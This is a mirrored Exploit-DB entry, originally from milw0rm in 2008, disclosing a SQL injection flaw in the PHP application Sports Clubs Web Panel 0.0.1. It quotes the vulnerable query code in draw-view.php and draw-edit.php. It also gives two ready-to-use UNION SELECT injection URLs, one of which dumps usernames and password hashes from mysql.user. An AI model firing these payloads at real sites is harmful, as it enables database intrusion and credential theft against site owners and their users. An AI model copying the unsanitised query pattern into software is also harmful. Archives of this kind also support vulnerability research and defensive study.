bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6435.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

39 lines
No EOL
1.3 KiB
Text
Raw Blame History

###################################################################################
# #
# ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::.... #
###################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(Zahra:zh_virangar)
special tnx :my master hadihadi
tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007
& all virangar members & all hackerz
-------
vuln codes in /include/draw-view.php:
line 22: if(isset($_GET['id']) || isset($_POST['id'])) {
lin 23: $teamid = $_GET['id'].$_POST['id'];
...
...
line 43: $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
----------
vuln codes in /include/draw-edit.php
line 1: $id = $_GET['id'];
line 2: $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");
--------
exploit:
http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*
http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*
-------------
young iranian h4ck3rz
# milw0rm.com [2008-09-11]
Reference in a new issue View git blame Copy permalink